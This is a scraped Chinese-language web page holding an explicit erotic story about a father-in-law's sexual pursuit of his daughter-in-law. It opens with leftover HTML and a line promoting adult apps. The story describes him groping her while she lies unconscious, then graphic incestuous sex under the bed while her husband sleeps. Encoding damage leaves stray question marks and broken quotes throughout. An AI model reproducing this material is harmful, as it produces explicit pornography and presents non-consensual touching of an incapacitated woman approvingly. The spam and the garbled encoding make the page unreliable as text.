<td id="loli0"><ruby id="loli0"></ruby></td>
    1. <table id="loli0"><ruby id="loli0"></ruby></table><big id="loli0"><strike id="loli0"><tt id="loli0"></tt></strike></big>

      以下APP站长已检测强烈推荐下载(狼友必备)

      聪明的儿媳

        歐陽雄雖然在看電視,但他的心已經飛到了浴室里的那個可人兒去了。那粉嫩的肌膚、火爆性感的身材,再加上那絕美的臉龐,如果……全脫掉那會怎么樣的呢?歐陽雄意淫著。對于他來說,男人就要懂得欣賞美麗的女人,這與親情倫理無關,愛美之心人皆有之。

      當然,歐陽雄也多多少少的被日本的AV影響了,而他最喜歡看的,恰恰是公媳亂倫的片子。因?他覺得,公公那個年紀,還能享受那青春的肉體、緊窄的嫩穴,而且還是兒子的老婆,禁忌的快感讓他總是樂在其中。

      而在老家,偶爾總會聽到哪家公公和兒媳有一腿的風流事,都是兒子出去打工長期不在家,而兒媳因?寂寞再加上生理需要,被公公誘惑下就半推半就的倒在公公胯下了。歐陽雄有時也會幻想著,那公公就是他,而兒媳就是陳嬌雪。

      歐陽雄看著兒媳好久都沒出來,心里想著,女人就是愛干凈,洗個澡也要那么久。突然歐陽雄眼前一亮,他想到了一個主意:假如我假裝肚子不舒服要上廁所,然后去催小雪出來,而小雪在慌忙的情況下有可能就忘了把衣服拿出來,那么,我的機會就來了。歐陽雄想到這,連忙來到浴室門前,想著要怎樣才能裝得像一點。

      就在這時候,浴室里傳來一陣“乒乓”響聲,歐陽雄愣了一下才敲了敲門,試探著問道:“小雪,發生了什么事啦?”只見里面無人回答,歐陽雄拍打著室門,著急的喊著:“小雪,怎么了?怎么不開門?”歐陽雄覺得事不尋常,但他又一時不知道鑰匙在哪,就只好踹門了。好在門也不是鐵門,所以踢了兩三下就把門踢開了,歐陽雄沖了進去,眼前的景像讓他的陽具馬上敬禮了起來。

      只見水灑還在噴著水,但地板上卻橫臥著一具性感妖嬈的肉體,但歐陽雄也無暇去慢慢欣賞,他把水灑關掉,拿來一條干浴巾,把兒媳給包裹起來,再攔腰把她給抱了出來。輕輕的把兒媳放在沙發上,才拿著干毛巾細細的把兒媳身上的水擦干。

      他不允許有水珠還留在兒媳的身上,所以歐陽雄擦得很認真,也很仔細,他從雪白的脖子下慢慢地來到那雪白挺拔的乳峰,慢慢地擦拭著,只是,那毛巾變成了他的大手,兒媳的乳房在他右手中變化著各種形狀。歐陽雄不敢太用力,而左手則順著絲綢般的肌膚來回游走,從沒有一絲贅肉的小腹,到修長的大腿,還有那圓潤的屁股,都讓歐陽雄激動不已。

      他內心也在天人交戰著:上?還是不上呢?這么好的機會,過了這個村就沒那個店了。又看看胯下那個支起的帳篷,仿佛是等待出鞘的寶劍,只等主人一聲令下,就隨著主人在這個可人兒身上沖鋒陷陣,殺得她丟盔棄甲。

      但歐陽雄還是嘆了口氣,把滿腔的欲火壓下。小雪終究是自己的兒媳婦,兒子的老婆,現在還昏迷著,趁人之危行禽獸之事不是他的作風,而且人昏迷著做起來也像充氣娃娃一樣,雖然兒媳長得有些像充氣娃娃。

      上了她呢是禽獸,但不上更禽獸不如吧!歐陽雄自嘲的想著。哎,能過過手癮也不錯。

      歐陽雄打電話給醫院后,找來一件睡衣給兒媳穿了起來,才對著陳嬌雪的人中用力地掐了幾下,并輕聲喊道:“小雪,小雪,醒醒!”隔了一會兒,陳嬌雪才悠悠醒來,她捂著脖子,對公公暈乎乎的說:“爸,我是怎么了?嗯,好痛!”

      歐陽雄關心的說:“你剛才倒在浴室里,是我抱你出來的,我已經打電話叫救護車了?!?br>
      陳嬌雪這時才清醒起來,想到浴室那一幕,臉一下子紅了。她爬起來,卻看到自己穿著睡衣,她結結巴巴的說:“爸,嗯,這睡衣……嗯,這個……”歐陽雄面不改色的說:“嗯,是我幫你穿的?!标悑裳┠樢幌伦蛹t到了脖子下,心想,多羞人??!老公才出差幾天,你就這么想男人了?還想到公公去?結果還是被公公抱出來的,還讓他給自己穿衣服,多難?情??!想到自己被公公赤身裸體的抱著,身子不禁滾燙起來。隨后又想,嗯,公公他不知道有沒有吃我豆腐呀?哎,看都看光了,還在乎揩沒揩油。只是不知道,公公他有沒有趁機對我做那種事???他應該不敢吧,我可是他兒媳??!

      下體也沒有感覺到什么異物進去過。陳嬌雪松了口氣。

      歐陽雄看到兒媳臉一會兒白、一會兒紅的,有些擔心的問道:“小雪,你沒事吧?”陳嬌雪回過神來,有些羞澀的說:“沒。爸,謝謝你?!睔W陽雄故作爽快的笑著說:“傻孩子,你說什么話呢,這是爸該做的。光明不在,不是你照顧爸就是爸照看你??!一家人可不能說兩家話??!”陳嬌雪乖巧的點點頭。


      當歐陽光明回來的時候,陳嬌雪已經好得差不多了,那天晚上,一家人樂呵呵的吃了一頓飯,期間還喝了點紅酒。

      今天陳嬌雪打扮得特別漂亮,一件露出潔白肩膀的T恤,領口很低,那黑色文胸包裹著豐滿嫩白的乳溝清晰可見,黑與白,更襯托出陳嬌雪那白嫩的肌膚。

      下面則是穿著一件緊身的小短裙,更吸引人的是還穿了一件黑色網狀絲襪,那黑與白的搭配,給歐陽雄父子視覺上的震撼。

      那走路搖曳生姿的迷人身材,還有那偶爾俯下身而乍現的春光,都讓他們起了男人最基本的生理反應,尤其是歐陽光明,眼里都是赤裸裸的欲望。歐陽雄也有,只是他不能表現出來,畢竟,坐在他面前的可是他的兒子和兒媳。陳嬌雪喝了點紅酒,不勝酒力的她已是滿臉酡紅,更顯得美艷不可方物。

      飯后,陳嬌雪收拾碗筷到廚房洗刷去了,歐陽雄就到客廳看電視去了。而歐陽光明說要幫陳嬌雪,也溜進了廚房。陳嬌雪正在洗碗,歐陽光明從背后環住陳嬌雪的腰,頭埋在她的肩上深深的吸了口氣,柔情的說:“老婆,我好想你??!你有沒有想我???”

      陳嬌雪被歐陽光明呼出的熱氣弄得脖子癢癢的,不禁“咯咯咯”的笑著說:

      “老公,我也好想你??!哎,你別這樣啊,我還在洗碗呢!”原來,歐陽光明的手已經探進了衣襟里,揉捏著那高聳的乳峰。陳嬌雪急忙按住那不規矩的手,回過頭來嬌嗔的說。

      歐陽光明輕啄了妻子的臉頰,有些興奮的說:“老婆,要不我們來點刺激的吧!”說著挺了挺下身。

      陳嬌雪這才發現自己臀部頂著一根硬硬的棍子,一挺一挺的。陳嬌雪知道那是什么東西,她有些花容失色,緊張的看了客廳方向一眼,低聲說:“你瘋啦,你爸還在外面呢,等下他進來怎么辦?”

      歐陽光明想想也覺得不適合,只好悻悻的打消那個邪惡的念頭,不過,那大手已經從摸胸轉移到那圓潤嫩滑的屁股上,陳嬌雪好無奈,她轉過身來環住老公的脖子親了一下,說:“老公,我要洗碗,你這樣我不好干活啊,你就再忍忍,先去洗個澡,我忙完了就去找你?!闭f完,調皮的眨了眨眼睛,意思你懂的。

      歐陽光明干笑了下,才戀戀不舍的從裙下抽出手來,他輕嗅了手上的余香,意猶未盡的說:“那好吧,老婆,你忙快點,我在房間等你哦!”陳嬌雪把歐陽光明推出了廚房,笑著說:“知道啦!洗澡去吧,身上臭死了?!?br>
      夏天的夜晚也是炎熱的,歐陽雄電視也沒有心情看了。兒媳忙好家務活后,跟他打了聲招呼就溜進房間去了,讓歐陽雄很不習慣,兒子沒回來前都是兒媳陪著他看電視的,跟美女兒媳一起評時事、說八卦、聊聊偶像劇,是多么令人愉快的事,尤其是兒媳偶爾穿著很清涼。

      那短短的睡裙而露出的雪白大腿,細吊帶襯衣下那深深的雪白的乳溝,那半透明的衣衫下,隱隱約約看看到那性感的文胸,甚至,那可愛的小內褲都能看得到些許痕跡。這些撩人的穿著,讓怕熱的歐陽雄感覺像吃了冰淇淋一樣涼爽。

      而陳嬌雪因?以前在家都是這樣穿著,有時候天氣太熱,還只是穿著三點式在家里晃。公公來了后,自然不敢那樣穿,怕被公公罵,但這幾天了解下來,陳嬌雪才發現公公是個很好相處的人,思想也不古板,有時候還跟她討論那些T臺走秀的名模的身材三圍。要知道,陳嬌雪本人可是個業余模特呢!所以后來也自然了起來,對于她來說,女人的魅力就是用來展現的。

      公公有時候偷瞄的眼光都讓陳嬌雪對自己的身材暗自得意,用她的話來說,就是老少通殺。歐陽雄自然清楚這小倆口干什么去了,年輕人嘛,小別勝新婚。

      只是他還是有些淡淡的嫉妒兒子的艷福,想想他年輕時都是父母之命,而老婆也是平凡之極。想想兒子等下的風流快活,再想想自己現在的處境,無奈地嘆了口氣,無精打采的回房間睡覺去了,年紀來了,不能像年輕人那樣熬夜了,早睡對身體很重要。

      在剛想進入房間時,眼光一掃過兒子的臥室,卻意外地發現門居然是半開著的。歐陽雄尋思著:“難道兒子兒媳他們辦那種事都是不關門的?”他腦子里想起了日本毛片中那公公偷看兒子兒媳做愛的場景,不禁有些心篤意亂。

      “難道我也有那個眼福?”歐陽雄輕輕的走過去,小心翼翼的往里面探了探頭:“嗯,怎么沒人?”兒子兒媳那青春揚逸的肉搏戰并沒有看到,讓他非常失望。

      這時,不遠處的浴室傳來說話聲,歐陽雄恍然大悟,原來他們正在洗鴛鴦浴??!歐陽雄走進去,來到了那張鋪著白色床罩的大床前,大床的上面是兒子兒媳的結婚照,照片上兒子英俊瀟灑,臉上掛著自信的微笑;旁邊的兒媳穿著一身潔白的婚紗,小鳥依人的靠在兒子肩上,一臉的幸福。

      床上,凌亂的扔著幾件衣服。歐陽雄拿起一件輕如無物的黑色絲襪,放在鼻尖嗅了嗅,一股清香直滲心扉。歐陽雄有時候都覺得奇怪,那巴掌大的小內褲,還有手上這么點的褲襪,兒媳是怎么穿上去。兒媳的屁股他摸過,并不小??!難道女人真的是水做的,那么的柔弱無骨嗎?

      這時候,走廊傳來一陣腳步聲,打斷了歐陽雄的臆想。他想出去,又覺得不妥,等下怎么跟他們解釋他來這里干什么?找他們聊天?別開玩笑了。

      腳步越來越近,歐陽雄也慌了神,四周看了一下,都沒有什么可以藏人的地方。他眼光突然看到大床,鬼使神差的居然撩起垂下的床罩,鉆進了大床底下,這才舒了口氣。而兒子他們也在歐陽雄剛鉆進床底后才踏入了臥室,不過相差幾秒鐘而已。

      歐陽光明拉著老婆的手,有說有笑的走進了房間。陳嬌雪只是圍著大浴巾,她坐在床上,用一條干毛巾仔細地擦著頭上的濕發。歐陽光明拿出了一個衣袋,有些神秘的對著老婆說:“老婆,你看,我給你買了什么東西?!标悑裳┬χ话褤屵^袋子,說:“是什么東西?我看看?!标悑裳┌汛永锏臇|西一股腦的倒在床上,藍色的空姐制服裝、白色的護士裝,還有紅色的兔子裝等等,看得陳嬌雪目瞪口呆。

      她看了好一會兒才張牙舞爪的朝歐陽光明撲過去:“你這個大色狼,就知道買這些東西嗎?”歐陽光明訕訕的笑了笑,摟住撲過來的老婆,有些哀求的說:

      “我的好老婆,你就穿給老公我看看行不行???看看我老婆穿上去是不是更性感漂亮了。我好想看啊,你就行行好吧!”

      陳嬌雪看著在那里裝小可憐的老公,不禁“噗哧”一笑,食指點了點歐陽光明的額頭,說:“你呀你,不知道怎么說你了。好吧,如你所愿,不過,你得閉上眼睛,等我穿好了你才能睜開眼睛,要不我就不穿了?!睔W陽光明舉起手,投降道:“好好好,我不看,你換吧!”說完面向大墻,閉上眼睛,陳嬌雪這才抖抖嗖嗖的換起了衣服。

      床下的歐陽雄聽到兒子和兒媳的對話,也不禁心癢癢起來,他小心翼翼的觀察周圍黑暗的環境,看能不能看到外面的光明。他把床罩微微的挑了一點,那對面衣柜的落地鏡讓他喜出忘外,因?這個鏡子剛好可以反射到房間的大部份的景像,心想:“兒子,你想獨樂樂???沒門,大家?樂樂吧!”陳嬌雪挑了套藍色的空姐制服,穿好后對自己左看看右看看,才滿意的說:

      “好了,你可以轉過來看啦!”

      歐陽光明聽了這句話,急不可待的轉過身來,眼前的美景讓他不禁呼吸急促起來,兩眼都成紅桃心了。只見陳嬌雪亭亭立立的站著,一頂藍色的帽子把那一頭青絲包裹在里面,身上穿著一件緊身藍色襯衫,把豐滿的雙乳束縛的更突出;胸襟處微微敞開著,一小半的雪白半圓弧線的乳溝若隱若現,潔白的玉脖上,打著一條藍色絲巾。

      而襯衫的下擺,被陳嬌雪刻意的打起個結,所以露出了那如雪的肌膚下的小巧玲瓏的肚臍眼。下身則是穿著一條超短藍色緊身迷你裙,而下面就是被黑色絲襪的包裹的修長玉腿,顯得那樣的高挑性感;而在屁股后面,居然別出心裁的開了個桃心小洞,剛好被上那彎曲的屁股溝的弧線,像一個粉嫩多汁的水蜜桃,讓人忍不住想咬一口。

      畢竟這不是真正的空姐制服,在設計方面都是突出女人的性感與誘惑,而陳嬌雪無疑就是那個最優秀的扮演者,把女人的嫵媚與性感而又不失端莊的儀態,演示得淋漓盡至。

      歐陽光明不知道原來穿著空姐制服是多么的誘惑,而歐陽雄也通過鏡子看得清清楚楚,胯下的陰莖翹得高高,忍不住悄悄用手握住自己的昂揚之物,緩緩地擼動著。而歐陽光明更是不堪,眼中充滿濃濃的欲火,只想把陳嬌雪焚燒殆盡。

      陳嬌雪兩條修長大腿交叉在一起,把帽子摘下掛在右手食指上,輕輕的轉動著,巧笑嫣然的說:“怎么樣,好看嗎?老公?!睔W陽光明吞了吞口水,說:“好看,太好看了,簡直就是?老婆你量身定做的??!好性感??!如果你真的去做空姐,那飛機都飛不起來了。呵呵!”陳嬌雪緩緩地踩著貓步,把帽子甩到一邊,來到歐陽光明面前,左手搭在歐陽光明的肩膀上,右手食指則是輕輕在其胸膛上劃著一個又一個的圓圈,充滿誘惑的聲音說:“真的那么好看嗎?那你有沒有什么獎勵沒有?嗯?”歐陽看著挑逗自己的老婆,再也忍不住心內燃燒的欲望,他猛地攔腰抱起陳嬌雪,向大床走去。陳嬌雪被老公這么一抱,“啊”的驚呼一聲,雙手急忙摟住老公的脖子。

      歐陽光明把老婆拋在床上,而陳嬌雪因?橫臥著,那緊身的迷你裙又向上縮了縮,連白色的小內褲都露出了一些,看得歐陽光明更是興奮不已,他像狼一樣的發出一聲低吼,猛地撲上老婆那性感誘人的嬌軀。

      歐陽雄很郁悶了,他在床底下,上面兒子兒媳婦就要開始肉搏戰了,對他來說,是一種煎熬。而他從鏡子看到床上的角度,也只是兒子那毛絨絨的大腿和兒媳白嫩的大腿,正點部位就看不到了,因?兒媳是被兒子壓著的。

      上面傳來“巴嘰、巴嘰”的聲音,還有兒媳那淡淡的呻吟,歐陽雄憑聲音就判斷出,兒子肯定是在吃兒媳婦那對豪乳。兒媳那對玉乳他也摸過,真是太極品了,渾圓飽滿,摸起來柔軟而富有彈性,那紅棗般的乳頭,都讓他垂涎欲滴。只是可惜,在上面翻云覆雨的不是他,而是他的兒子。

      “如果現在上面的男人換成是我,那該多性福啊,我要讓她嘗嘗我這把老槍的厲害?!睔W陽雄在意淫著。

      “噗”,一件藍色襯衣掉了下來,接著,又一條裙子被扔了下去,然后,文胸、內褲,接二連三的散落在床下。而床上的陳嬌雪已然不絲寸縷,被歐陽光明剝成了小白羊,那沈魚落雁的容?,高挺的雪乳上,兩顆紅棗在空氣中慢慢硬挺起來,右腿微微弓起,而一只邪惡的大手正在大腿內來回摩挲著,偶爾還劃過那粉嫩的私處,引得陳嬌雪微微顫抖,圓潤的屁股不禁往上挺了挺,好像在渴望著什么。

      而陳嬌雪已經是媚眼如絲、滿臉潮紅,那潔白如玉的身子已經慢慢地成?粉色,這是她動情的表現。她微微嬌喘著,抱著埋在她雙乳間吸吮的老公的頭,有些迷亂的說:“嗯……老公,別……別吸了,來干我吧,小妹妹好癢了……快來吧,我受不了了……”

      也怪不得陳嬌雪會如此反應,身懷名器白虎的她,性欲是別人的好多倍,也特別的敏感。而且歐陽光明出差了十幾天,她的性欲得不到滿足,只好壓抑著,而歐陽光明回來后,欲望便如潮水一樣一發不可收拾。

      床下的歐陽雄忍受著上面的顛簸,他也很興奮。他的手上,赫然握著一條白色的小內褲,就是那條很悲催的小內褲,它剛好就掉在床底邊上,被歐陽雄看到了,一只手指頭慢慢地伸出去,勾住內褲的一個角,慢慢地,慢慢地,拖進了床底里面。

      當然,床上的那兩位可是毫無察覺的,在這關頭,誰會去關心掉在地上的小內褲呢?歐陽雄捧著這個意外之喜,把鼻子埋在里面,深深的呼吸著那醉人的香味??赡苁莾合毕春迷鑴倱Q的內褲,所以上面沒有尿味,但卻有一股淡淡的香。

      歐陽雄知道那是女人香,有的女人天生就有著香味,雖然也有不同的,但絕不是香水的味道。這種味道就像催情劑,讓人激情膨湃。歐陽雄把小內褲按在他勃起的陽具上,激動的擼動著。兒媳的肉吃不到,我喝點殘湯總可以吧?

      床上的夫妻倆卻發生了意外,歐陽光明把老婆的玉腿架在肩上,發亮硬挺的陰莖對準了粉嫩的陰唇,那私處已經泛濫成災。他握住陰莖用龜頭摩擦了幾下那水嫩的陰唇,沾了沾上面的淫水,腰一挺,“噗嗤”一聲插了進去。

      陳嬌雪感覺到一根火熱的棍子插入了自己那空虛寂寞多時的小穴,那粗漲的陽具把她的陰道充實得滿滿的,讓她“啊”的一聲,雙手緊抓著床單,舒服的叫了起來。

      但是就這一下,體內那棍子突然漲得更大,歐陽光明滿臉通紅,渾身顫抖幾下,快速的抽插幾下就趴在老婆身上一動不動了。一會兒他才懊惱的說:“唉,還是不行啊,就插這么一下,這么快就射了,身體還是沒完全調理好??!老婆,對不起?!?br>
      床下的歐陽雄愣了愣,兒子有早泄這個毛???原來,歐陽光明在結婚后一時太放縱性生活,雖然后來調養了身子,但還是傷了點元氣,得了早泄這個毛病。

      這次他出國除了出差之外,順便也去找國外的醫生求醫問藥。

      畢竟家里有個如花似玉的老婆而自己卻不能大展雄風,是多么的令人沮喪。

      陳嬌雪雖然滿身欲望得不到滿足,但她還是強忍欲望,雖然她很想把這個銀槍蠟燭頭的男人踢下床去,性欲起來了卻得不到滿足的女人同樣是可怕的,尤其是身懷名器的她。

      但她看到老公那懊惱慚愧的樣子,心又一軟,只好幽幽一嘆,言不由衷的反抱著老公,安慰著說:“老公,你剛才那一槍好厲害,我好舒服的。沒事,你會好起來的,我還等著你來征服我呢!”

      歐陽光明看著善解人意的老婆,感動的摟著說:“老婆,你真好,我愛你。我會好好愛你一輩子?!?br>
      陳嬌雪把頭埋在老公胸前,悶悶的說:“老公,我也愛你?!毙睦飬s是嘆了嘆氣:“什么時候我才能享受那完美的性愛???我真的真的好想要??!”歐陽光明探手往床柜里取出一盒膠囊,倒了一杯水仰頭喝下,有些自慚的對陳嬌雪說:“這是我從國外帶回來的,聽說很有療效,就買來試試??上?,西藥的副作用很大,吃了就很困,很想睡覺?!?br>
      陳嬌雪關心的說:“副作用大那就別吃吧!我們還是看中醫好,雖然不能立竿見影,但也很有效果的?!?br>
      歐陽光明把玩著老婆胸前的玉兔,笑著說:“但你老公等不及了??!放著你這個大美人卻不能享用,是多么痛苦的一件事??!”歐陽光明打了個哈欠,有些睡意的說:“看,這藥效就是來得快,我有點想睡覺了?!标悑裳┯H了老公一下,柔聲說道:“那睡吧,一切都會好的。我可不喜歡裸睡,我下去穿件內褲吧!”

      床底下的歐陽雄聽到一下子慌了神,手里拿著兒媳的內褲,還藏在他們的床底下,這等下要怎么解釋?怎么解釋都沒用的。怎么辦?怎么辦……歐陽雄急得像熱鍋上的螞蟻團團轉。

      陳嬌雪滿懷心事的下了床,心里想著:“唉!等一下又得自己用手解決了。

      我不要這樣,我要熱呼呼的大肉棒,大肉棒??!”陳嬌雪饑渴的想著。

      她往床下一掃,嗯,內褲怎么不見了?她左右看了一下,沒有看到,難道在床底下?她也沒多想,就跪著膝,撩起了床罩。歐陽雄看到一雙潔白的雙足踩在地板上,那玉足是多么的精致,讓人想捧在懷里細細把玩。

      接著,床罩被撩了起來,那還泛紅的絕色容?,還有那因?趴著而下垂的玉乳,隨著兒媳的動作而輕微晃動著。美人美景,但歐陽雄已無心觀賞,他只是尷尬的把手中的內褲遞給兒媳,一邊拼命的向兒媳搖手,暗示她不要讓兒子發覺。

      陳嬌雪撩起床罩,卻沒想到里面還有個人,一時嚇了一跳,驚呼起來。定神一看,原來是公公,他滿臉通紅,一臉尷尬的拿著自己的內褲,在那里拼命的搖著手。

      床上的歐陽光明扭頭過來問:“老婆,怎么啦?”陳嬌雪心思急轉一下,她一把扯過小內褲,放下床罩,假裝撫摸著額頭說:“剛才沒注意,拿內褲的時候不小心碰到頭了。沒事啦,你快睡吧!”說完爬上了床,和歐陽光明并排睡在一起。

      她被公公驚嚇而急速跳動的心才稍微平靜下來,想著:“公公他怎么會在房間里?還躲在床底下!難道他一直都心懷不軌,專門來偷看我和老公做愛?啊,好羞人,剛才都被公公給看光了啊,還有剛才和老公做的事都被他知道了。剛才我應該喊人的,但我?什么沒喊呢?他是我的公公,老公的父親,家和萬事興!如果被老公知道了,以后大家都會尷尬的,甚至還有更不愉快的事情發生,我可不想看到老公和公公反目?!?br>
      其實,陳嬌雪看到公公在床底向她搖手那狼狽的樣子,讓她下意識的圓起了謊。也可能是公公平時對她很關心愛護,所以她不想看到家不和的那一幕,又或者,還有什么別的原因,總之,歐陽雄這一關算是僥幸的過去了。

      歐陽光明“啪”的一下把房里的燈滅了,對著老婆說:“睡吧,晚安?!标悑裳班拧绷艘宦?,想著公公還躲在床底下,心里總覺得很異樣,有些冷卻的身子又有些滾燙著。歐陽雄看著黑暗的周圍,他暗自舒了一口氣,對兒媳更是暗暗感激。他在等兒子熟睡了才敢偷偷的溜出去。

      陳嬌雪卻怎么也睡不著,公公還躲在下面了,“啊,剛才他手上拿著我的內褲,不會是用它來做那種事吧?”她想到自己身上穿的小內褲有可能被公公自慰過,身子更加滾燙了:“公公,他應該很喜歡喜歡我的吧?他的那個東西應該很大吧?不知道還能用不?”

      陳嬌雪一想到肉棒,不禁嚶嚀一聲,私處不禁又流出了些濕濕的液體出來,手忍不住探進內褲里,慢慢撫摸著陰唇。慢慢地,內褲里的玉手動作越來越大,陳嬌雪干脆?起屁股,把剛穿上的內褲脫下來,全身一絲不縷,側身弓著身子,咬著那紅艷的嘴唇,一下一下的探進了身體。想著公公在下面,而自己就在上面自慰,異樣的刺激讓她的情欲一下如山洪爆發了。

      手,還是取代不了那又熱又硬的大肉棒??!陳嬌雪媚眼如絲,發情的女人其實和發情的男人都一個樣,都要發泄,當欲望沖昏了頭腦時,什么事都有可能發生,無疑,陳嬌雪就是這么個女人,她已經被欲望戰勝了理智。她看著漸漸打起呼嚕的老??公,心中閃過一個大膽瘋狂的想法,她往床柜里掏出了一個安全套,悄悄的滑下床,鉆進了床底下。

      歐陽雄正琢磨著怎樣出去,突然,黑暗中一具火熱的嬌軀溜了進來,摟住了歐陽雄的身子。一股吐氣如蘭的氣息,在歐陽雄耳邊輕聲說:“爸,愛我?!睔W陽雄不敢相信自己的眼睛,他感覺好像在做夢,懷里的兒媳正躺在自己的胸前,而兒媳的那句“愛我”,這一刻,他覺得好幸福。他緊緊地摟住兒媳的嬌軀,雖然在伸手不見五指的黑暗中,但歐陽雄還是準確的吻住那柔軟的紅唇,和那條丁香小舌纏綿著,吸吮那甜蜜的芳香。大手則是在那挺翹充滿彈性的屁股上來回撫摸,感受著那圓潤的弧度,另一只大手則攀上兒媳高聳的玉峰,揉捏著那凸起的乳頭。

      他緊緊地摟住這性感誘人的尤物,仿佛想把這柔弱無骨的嬌軀揉進體內。他的嘴慢慢地往下吻,從脖子一直來到那乳峰上,舔著、輕咬著……那淡淡的奶香味讓歐陽雄覺得,這是媽媽媽的味道。大手從臀部來到了大腿內側,當覆蓋上那女人最私密的地方時,赫然發現已經濕漉漉了。

      歐陽雄笑很邪惡,他滑到兒媳下面,把兒媳的雙腿向外張開,頭一埋,扎到兒媳的私處,伸出舌頭在那粉嫩無毛的陰唇上輕輕的舔著,女人發情流出來的液體都有一股騷味,只是兒媳卻沒有那么濃,只是淡淡的,讓人不覺得惡心。他干脆把嘴堵住了整個陰唇,吸琢里面的瓊漿玉液,對于好多年沒舔過陰的歐陽雄來說,的確是這樣。

      陳嬌雪被公公這么一吸,雙腿不禁往里一夾,把公公的頭夾在里面,雙手則插入公公那濃密的頭發中,無意識的摸著。嘴唇輕咬著,不讓自己的呻吟聲發出來,只是屁股微微的一次又一次的往上?,配合著公公的魔舌,讓他的舌頭更深入一點。

      歐陽雄很賣力,他細細的在那勃起的陰蒂上舔著,偶爾,像蛇的舌頭一樣呼的一下探進陰道里,探索那幽深的蜜境,每當這個時候,兒媳就會繃緊全身,雙手緊緊地扯住他的頭發。

      歐陽雄很得意,兒媳的G點被他給發掘出來了,因?這動作才運作了幾下,舌頭就被那柔軟的嫩肉緊張收縮的包裹著。接著,一小股液體噴了出來,他張開嘴,把它全部喝了下去,“聽說女人的陰液能壯陽,不知道是不是真的?”歐陽雄想著。

      歐陽雄已經忍受不了了,他想提槍上馬,但還是有些忌諱:“她可是自己的兒媳婦,兒子的老婆,未來孫子的媽媽,這樣上了會不會遭雷劈?如果不小心有了,那她以后生下來的孩子是叫我爸爸還是叫爺爺?對兒子叫爸爸還是哥哥?”這關系可真夠亂的??!

      但這種禁忌的誘惑,卻讓他更加興奮,他壓在兒媳身上,胯下巨挺頂在兒媳的小腹上,在兒媳耳邊欲擒故縱的輕聲說道:“小雪,要不我們適可而止吧,我們這樣下去可是亂倫??!”

      陳嬌雪已經是意亂情迷,這種禁忌的刺激已經把她的理智淹沒,剩下的,只是動物的本能,那就是交配。她怎能忍受那一而再、再而三半途而廢的高潮?她迫切的想體驗那種飛仙般的快樂。

      她往下握住那頂在自己小腹上的兇器,才發現公公的兇器是那么的粗大,那么的堅硬,而且還比老公的長,一想到等下要被這根巨物貫穿體內,填滿她空虛的蜜穴,身上興奮的顫抖著。歐陽雄昂揚的陽具被兒媳的小手這么一握,全身如電流通過,舒服的喘了口氣。

      陳嬌雪費力地摸出放在旁邊的安全套,有些顫抖的對壓在她身上的公公的耳邊輕聲的說:“爸,我要,我要你的大雞巴干我。來干我吧,小雪我受不了了,你兒子不行,你就滿足我的欲望吧!”

      歐陽雄淫笑的挑逗著:“但我們是公媳啊,這樣做是亂倫???你不怕下地獄嗎?”

      陳嬌雪喃喃地說:“下地獄?下地獄就下地獄吧!不管那么多了。在這黑暗里,我們誰也看不見誰,你不把我當兒媳,我不把你當公公,不就行了嗎?”陳嬌雪有些自欺欺人。

      她把安全套摸索著套在公公的陰莖上,欲火焚身的說:“爸,來吧,戴套就不算亂倫了,至少有個塑料膜隔著?!?br>
      歐陽雄把安全套戴好,兒媳的“戴套不算亂倫”這句話,徹底地把他所有的顧忌和道德倫理拋出九霄云外。他依稀記得,有段新聞說的是一個女老師被一個官員強奸了,報案后那個派出所所長居然說戴套不算強奸的牛語而輿論大嘩。兒媳把這段話套用在亂倫上,真是神來之筆,讓公媳之間的淫亂找到了彼此接受的共同點。

      歐陽雄喘了口氣,緩解一下興奮的神經。他知道,太興奮的話,等一下會快速繳槍棄械的,這是他這幾十年來的性經驗。而且難得在這個美艷性感的兒媳婦身上馳騁,他當然得好好表現一下他的男性雄風,以后,日子還長著呢!

      他把兒媳的兩條長腿環在自己的腰上,握住陰莖頂在那水嫩多汁的蜜穴上,趴在兒媳的身上,輕咬著她的耳朵含糊的說:“小雪,我的好兒媳,公公我來了哦!”說完,腰一挺,火熱堅硬的陽具隨即深深的捅進兒媳的體內。

      陳嬌雪舒服死了,她雙腿緊緊地夾住公公的腰,雙手緊抱著公公的背部,呼吸變得很急促,雙眼已然迷離起來:“嗯……好粗,好漲,好長,好舒服??!”歐陽雄剛開始只是緩緩地抽插著,畢竟是第一次光臨,還不是很清楚里面的底細,孫子兵法曰:“知己知彼,百戰百勝”嘛!只是感覺兒媳的陰道很濕熱,周圍的嫩肉把他的肉棒擠壓得緊緊的,雖然淫液很多,但推進抽出還是有些阻力的,而且那嫩肉是一層環著一層,每推進一些,就好像又有另一層肉包裹著;而抽出來,卻感覺里面有股吸力在吸取他的馬眼,不讓他輕易脫身。

      還好歐陽雄經驗豐富,馬上調節好自己的節奏,換成年青人,肯定是一泄千里。歐陽雄嘖嘖稱奇,名器就是名器,果然與?不同??!

      而陳嬌雪隨著公公的抽插,在交合處的淫水是越來越多,她感覺到,自己現在已經站在云端上翩翩起舞,一群白天鵝在她周圍飛來飛去,她好開心好開心。

      全身的毛孔都舒張開來,好像身上有些壓抑很久的熱氣隨著毛孔蒸發出去,全身都成粉色的了,還散發出淡淡的香味。

      歐陽雄不禁暗呼兒媳太極品了。他已經慢慢地習慣了兒媳的蜜穴,胯下的動作越來越快,陽具在兒媳體內進進出出,每次出來都會帶出一點水漬,而陰道最外面的一些嫩肉也會隨著肉棒的出去而黏著出去,好像是怕這帶給她快樂的小弟弟不要她了似的緊緊地跟著它,而肉棒挺進去,也跟著溜了進去。

      可惜,這個床底下空間小了點,只能男上女下和側插,其它的性交姿勢就不能做了,要不然歐陽雄還想把他十八般武藝統統用在這嬌俏的兒媳身上呢!但又想著,兒子在上面睡覺,而自己卻在床底下干這性感的兒媳婦,兒子的老婆,那禁忌的快感讓他的肉棒漲得更粗更大了。

      而陳嬌雪被體內那突然漲大的肉棒刺激著,全身都開始緊繃起來,圓潤的十個腳趾頭挺得直直的,屁股不由自主地拼命往上?,迎合著公公陰莖的入侵。臉上已是潮紅如血,交合處更是滴水漣璉,隨著肉棒的抽插,不時有些“哧哧”的輕微水聲,整個床底都彌漫著淡淡的淫靡味道。

      陳嬌雪快樂得想大叫,但她不敢,上面睡著自己的老公,而自己卻和公公在床底下進行著茍合之事。但是這種禁忌的刺激卻讓她的感官更勝一層樓,體驗到從未有過的感覺,她咬緊嘴巴,不讓呻吟的浪叫聲發出來,只是緊摟著公公壯實的腰,一下又一下的幫著公公往下壓,讓公公的肉棒能更深的插入自己體內。

      歐陽雄一邊干著兒媳婦,一只手也忙著揉捏兒媳高聳的乳峰,而嘴里也含著另一只玉乳,那潔白的雙乳都留下了他的唇印和口水。

